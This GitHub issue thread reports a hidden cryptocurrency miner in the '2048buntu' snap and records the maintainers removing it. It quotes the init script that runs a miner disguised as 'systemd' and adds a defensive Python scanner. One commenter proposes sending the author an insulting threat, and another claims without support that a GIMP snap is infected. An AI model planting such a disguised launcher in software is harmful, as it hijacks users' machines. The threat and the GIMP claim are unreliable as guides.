How to ask to ban the application for security reasons? #651

Closed
tarwirdur opened this issue May 11, 2018 · 13 comments

@tarwirdur tarwirdur commented May 11, 2018

This application contains a hidden crypto-currency miner inside.

  • squashfs-root/systemd - miner
  • squashfs-root/start - init script:

```bash
#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}
```

I did not find a way to complain about the application. Which way is good for it?
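A triage sketch for the layout reported above, as an added example that is not part of the original issue or of the project's own code: it walks an unpacked snap tree (such as the `squashfs-root` directory named in the report) and flags the traits visible in the quoted start script. The daemon-name list, the rule wording and the sample tree are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Assumed list: daemon names a game snap has no reason to ship as its own binary.
DAEMON_NAMES = ("systemd", "init", "cron", "sshd", "dbus-daemon")
NAME_ALT = "|".join(map(re.escape, DAEMON_NAMES))
# Heuristics drawn from the start script quoted in the report.
SCRIPT_RULES = {
    "passes an account-like -u argument": re.compile(r"\s-u\s+\S+@\S+\.\S+"),
    "counts CPU cores": re.compile(r"grep\s+-c\s+\^processor\s+/proc/cpuinfo|\bnproc\b"),
    "runs a daemon-named binary from the snap": re.compile(rf"/snap/\S+/current/({NAME_ALT})\b"),
}

def triage_snap_root(root):
    """Return sorted (relative path, reason) findings for an unpacked snap tree."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        with path.open("rb") as fh:
            magic = fh.read(4)
        if path.name in DAEMON_NAMES and magic == b"\x7fELF":
            findings.append((rel, "ELF binary named like a system daemon"))
        if magic.startswith(b"#!"):
            text = path.read_text(errors="replace")
            findings += [(rel, why) for why, rx in SCRIPT_RULES.items() if rx.search(text)]
    return sorted(findings)

def build_sample(root):
    """Constructed tree mirroring the reported layout; 'systemd' is only an ELF stub."""
    root = Path(root)
    (root / "systemd").write_bytes(b"\x7fELF" + b"\0" * 60)
    (root / "start").write_text(
        "#!/bin/bash\nname=2048buntu\ncurrency=bcn\n"
        "cores=($(grep -c ^processor /proc/cpuinfo))\n"
        "/snap/$name/current/systemd -u user@example.invalid --$currency 1\n")
    (root / "bin").mkdir()
    (root / "bin" / "game").write_text('#!/bin/sh\nexec "$SNAP/usr/bin/game" "$@"\n')

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for rel, why in triage_snap_root(tmp):
            print(f"{rel}: {why}")
```

Each finding is a reason to look closer, not a verdict: a legitimate snap can count cores or take a `-u` option, so the hits are most useful in combination.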

@mathe30 mathe30 commented May 12, 2018

Send him a message on the email that says:

@mathe30 mathe30 commented May 12, 2018

I know your lil dirty secret, remove the application or I am gonna send this on public and will let your mum know that you are cheap bitch

@sparkiegeek sparkiegeek self-assigned this May 12, 2018
Collaborator

@sparkiegeek sparkiegeek commented May 12, 2018

Thanks for the report, we're removing these from the store whilst we investigate

Author

@tarwirdur tarwirdur commented May 12, 2018

@sparkiegeek, note that other applications from this author contain a miner too. (I've checked only 2048buntu and hextris, but I suppose that the others contain it too.)

UPD: already deleted. Thank you.

Collaborator

@sparkiegeek sparkiegeek commented May 12, 2018

@tarwirdur yes, we've removed all applications from this author pending further investigations.

Thank you for your vigilance!

@Enerccio Enerccio commented May 13, 2018

aww let the poor guy get his ferrari...

@tdemin tdemin commented May 13, 2018

@Enerccio what's the point in being poor and getting a Ferrari?

@oliwarner oliwarner commented May 13, 2018

Any plans to push a fake package update that forcibly uninstalls this crap?

@Ads20000 Ads20000 commented May 13, 2018

For future reference the store category on the snapcraft forum is probably the best place to ask for a store removal. Pretty much all the snappy developers watch that forum pretty regularly so you'd possibly get an even swifter response than the one you got here.

Also I've started a topic there asking what action will be taken to make this less likely to happen in the future.

@rliden rliden commented Jul 25, 2019

The app is still up in the OP post. Why?

Author

@tarwirdur tarwirdur commented Aug 5, 2019

> The app is still up in the OP post. Why?

@rliden this app was cured and replaced with a cured version.
On victims' computers it should be automatically updated to the cured version.

Now you can see `Snap Quarantine (snap-quarantine)` as the application author.

@ghost ghost commented Aug 10, 2019

GNU Image Manipulation Program (GIMP) by Snapcrafters, which is another application with this virus, is still up on the Ubuntu Store, so be careful you install the other GIMP you find. Their trick is to prevent people from commenting or rating on the Ubuntu Store, which prevents people from knowing it is a virus.

@Ads20000 Ads20000 commented Aug 27, 2019

@UltraFractal can you substantiate your claim? I find it very unlikely that GIMP by https://github.com/snapcrafters has this crypto miner. For the snapcrafters GitHub repo and the snapcrafters store account, as far as I'm aware, it's Canonical employees who have write access, so Canonical itself would be culpable if your claim is correct. If you can prove that GIMP by snapcrafters has this crypto miner then please provide your evidence.
